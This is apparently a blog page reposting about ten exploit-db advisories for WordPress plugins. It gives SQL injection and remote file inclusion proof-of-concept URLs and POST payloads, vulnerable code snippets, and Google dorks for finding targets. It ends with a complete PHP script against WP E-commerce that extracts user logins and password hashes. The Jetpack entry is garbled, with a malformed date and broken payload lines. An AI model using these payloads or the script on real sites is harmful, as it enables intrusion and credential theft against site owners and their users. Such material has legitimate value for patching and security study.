injection | AppUnix

WordPress jetpack plugin SQL Injection Vulnerability

23/11/2016 por little_oak

######################################################

# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability

# Date: 2011-19-11

# Author: longrifle0x

# software: WordPress

# Download:http://wordpress.org/extend/plugins/jetpack/

# Tools: SQLMAP

######################################################

*DESCRIPTION

Discovered a vulnerability in jetpack, WordPress Plugin,

vulnerability is SQL injection.

File:wp-content/plugins/jetpack/modules/sharedaddy.php

Exploit: id=-1; or 1=if

*Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)

http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][MID((VERSION()),1,6)

Fonte: http://www.exploit-db.com/exploits/18126/

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

23/09/2011 por little_oak

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested)

—
PoC
—
http://SERVER/db_unx_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)

—
Vulnerable Code
—
if (isset($_FILES[‘wpmm-upload’])) {
// Create WordPress environmnt
require_once(urldecode($_REQUEST[‘abspath’]) . ‘wp-load.php’);

// Handle attachment
WPMiniMail::wpmm_upload();
}

Fonte: http://www.exploit-db.com/exploits/17868/

WordPress PureHTML plugin <= 1.0.0 SQL Injection

11/12/2015 por little_oak

# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

—————
Vulnerable code
—————
if(!isset($_POST[‘PureHTMLNOnce’])){
if ( !db_unx_verify_nonce( $_POST[‘PureHTMLNOnce’], plugin_basename(__FILE__) )) {header(“location:”.$refer);}
}
else{
…
if(isset($_POST[‘id’])){$id = $_POST[‘id’];}else{$id=’0′;}
…
$action = $_POST[‘action’];

#delete
if($action == “delete”){
$sql = “delete from “.$wpdb->prefix.”pureHTML_functions WHERE id='”.$id.”‘”;
$wpdb->query($wpdb->prepare($sql)); //misusage of $wpdb->prepare() :)

Fonte: http://www.exploit-db.com/exploits/17758/

WordPress yolink Search plugin <= 1.1.4 SQL Injection

06/09/2011 por little_oak

# Exploit Title: WordPress yolink Search plugin < = 1.1.4 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip # Version: 1.1.4 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1 --------------- Vulnerable code --------------- $post_type_in = array(); if( isset( $_POST['page'] ) ) { $post_type_in[] = '"page"'; } if( isset( $_POST['post'] ) ) { $post_type_in[] = '"post"'; } $post_type_in = '(' . implode(',', $post_type_in) . ')'; $id_from = $_POST['from_id']; $batch_size = $_POST['batch_size']; $post_recs = $wpdb->get_results( $wpdb->prepare( "SELECT ID,GUID FROM $wpdb->posts WHERE post_status='publish' AND post_type IN $post_type_in AND ID > $id_from order by ID asc LIMIT $batch_size" ) ); //misusage of $wpdb->prepare() :)

Fonte: http://www.exploit-db.com/exploits/17757/

WordPress wp audio gallery playlist plugin <= 0.12 SQL Injection

06/09/2011 por little_oak

# Exploit Title: WordPress wp audio gallery playlist plugin < = 0.12 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/wp-audio-gallery-playlist.0.12.zip # Version: 0.12 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1' UNION ALL SELECT 1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23--%20 --------------- Vulnerable code --------------- $table_name = $wpdb->prefix . "posts"; ... if (isset($_GET['post_gallery'])) $query = 'SELECT * FROM '.$table_name.' WHERE post_parent = \''.$_GET['post_gallery'].'\' AND post_mime_type = \'audio/mpeg\' ORDER BY menu_order ASC';

Fonte: http://www.exploit-db.com/exploits/17756/

WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability

06/09/2011 por little_oak

# Exploit Title: WordPress Crawl Rate Tracker plugin < = 2.0.2 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip # Version: 2.0.2 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20 --------------- Vulnerable code --------------- class b3_chartData extends b3_sbTrackingConfig { public function tracking_bot_report_chart_data() { ... if($_GET['page_url'] != '') { $bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(visit_time)) visit_date,robot_name,COUNT(*) total FROM $this->sbtracking_table WHERE visit_time >= '$start' AND visit_time < = '$end' AND page_url = ‘” . $_GET[‘page_url’] . “‘ GROUP BY visit_date,robot_name“); …

if ($_GET[‘chart_data’]==1) { … $chartData = new b3_chartData(); echo $chartData->tracking_bot_report_chart_data();

Fonte: http://www.exploit-db.com/exploits/17755/

WordPress Event Registration plugin <= 5.4.3 SQL Injection

06/09/2011 por little_oak

# Exploit Title: WordPress Event Registration plugin < = 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

--------------- Vulnerable code --------------- $id= $_REQUEST['id']; ... $sql = "SELECT * FROM " . $events_detail_tbl . " WHERE id='$id'"; $result = mysql_query($sql);

Fonte: http://www.exploit-db.com/exploits/17751/

WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vulnerability

18/08/2011 por little_oak

# Exploit Title: WordPress Contus HD FLV Player plugin < = 1.3 SQL Injection Vulnerability # Date: 2011-08-17 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/contus-hd-flv-player.1.3.zip # Version: 1.3 (tested) --- PoC --- http://www.site.com/wp-content/plugins/contus-hd-flv-player/process-sortable.php?playid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&listItem[]=1

--------------- Vulnerable code --------------- $pid1 = $_GET['playid'];

foreach ($_GET['listItem'] as $position => $item) : mysql_query("UPDATE $wpdb->prefix" . "hdflv_med2play SET sorder = $position WHERE media_id = $item and playlist_id=$pid1 "); endforeach;

Fonte: http://www.exploit-db.com/exploits/17678/

WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability

18/08/2011 por little_oak

# Exploit Title: WordPress File Groups plugin < = 1.1.2 SQL Injection Vulnerability # Date: 2011-08-17 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip # Version: 1.1.2 (tested) --- PoC --- http://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121))) --------------- Vulnerable code --------------- $fgid = $_GET['fgid']; ... $file_list = $wpdb->get_col("select guid from db_unx_posts where post_parent = $fgid");

http://www.exploit-db.com/exploits/17677/

WP E-commerce plugin <= 3.8.4 SQL Injection Exploit

08/08/2011 por little_oak

# Exploit Title: WP E-commerce plugin < = 3.8.4 Sql Injection # Google Dork: inurl:page_id= “Your billing/contact details” # Date: 18/07/2011 # Author: IHTeam # Software Link: http://www.getshopped.org/ # Version: 3.8.4 # Tested on: 3.8.4 # Original Advisory: http://www.ihteam.net/advisory/wordpress-wp-e-commerce-plugin/ $value ) { $form_sql = "SELECT * FROM " . WPSC_TABLE_CHECKOUT_FORMS . " WHERE id = '$value_id' LIMIT 1"; $form_data = $wpdb->get_row( $form_sql, ARRAY_A );

FIX: Upgrade to version 3.8.5

Bug found by: IHTeam Simone R00T_ATI Quatrini Marco white_sheep Rondini Francesco merlok Morucci Mauro epicfail Gasperini For GetShopped as their security auditors

This code has been released under the authorization of GetShopped staff. It will show user_login and user_pass of db_unx_users table;

Google Dork: inurl:page_id= "Your billing/contact details" Follow us on Twitter! @IHTeam */ function help() { echo "\n"; echo " -------------------WP e-Commerce < = 3.8.4 SQL Injection---------------\n\n"; echo " How to use: php wp-ecommerce.php host path page_id [table_name]\n\n"; echo " host = Domain name\n"; echo " path = Path of WordPress\n"; echo " page_id = Int value of the login page of WP e-commerce\n"; echo " table_name = Default is db_unx_users\n\n"; echo " Example: php wp-commerce.php www.domain.com /wordpress/ 11 db_unx_users\n\n"; echo " ----------------------------------------------------------------------\n\n"; } function exploit($host,$path,$pageid,$table) { $url = $host.$path."?page_id=".$pageid."&edit_profile=true"; $buggy_code=urlencode("-2' UNION ALL SELECT 2, concat(user_login,':',user_pass), 'email', 1, 1, null, 1, 2, 'billingfirstname', null, 0 from ".$table." WHERE '1'='1"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POST, 3); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POSTFIELDS,"collected_data[".$buggy_code."]=&submit=Save+Profile&submitwpcheckout_profile=true"); $result= curl_exec ($ch); curl_close ($ch); echo "Now using table name: $table... "; preg_match("/(.*?)< \/span>. /", $result, $matches); if ( !isset($matches[1]) ) $msg="Wrong table name or not vulnerable\n"; else $msg="Credential found: ".$matches[1]."\n";

return $msg;

}

if ( isset($argv[1]) && isset($argv[2]) && isset($argv[3]) ) { if (isset($argv[4])) $table = $argv[4]; else $table = "db_unx_users";

$host = $argv[1]; $spos=strpos($host, "http://"); if(!is_int($spos)&&($spos==0)) $host="http://$host";

$path = $argv[2]; $pageid=(int)$argv[3];

/* Detecting the version, if possible */ $version = file_get_contents($host.$path.'wp-content/plugins/wp-e-commerce/readme.txt'); preg_match("/Stable tag: (.*)/", $version, $vmatch);

if ( !isset($vmatch[1]) ) $version="Not detectable\n"; else $version=$vmatch[1];

echo "Version: ".$version."\n"; /* End of version detecting */

/* Executing exploit */ preg_match('/[^.]+\.[^.]+$/', $host, $hmatch); $host_name=str_replace('http://','',$hmatch[0]);

$tarray = array($table, 'wordpress_users', '_users', 'users', 'wpusers','wordpressusers', $host_name.'_users', str_replace('.','',$host_name).'_users', str_replace('.','',$host_name).'users' );

foreach($tarray as $index => $val) { echo exploit($host,$path,$pageid,$val); } /* End of exploit */ } else help();

Fonte: http://www.exploit-db.com/exploits/17613/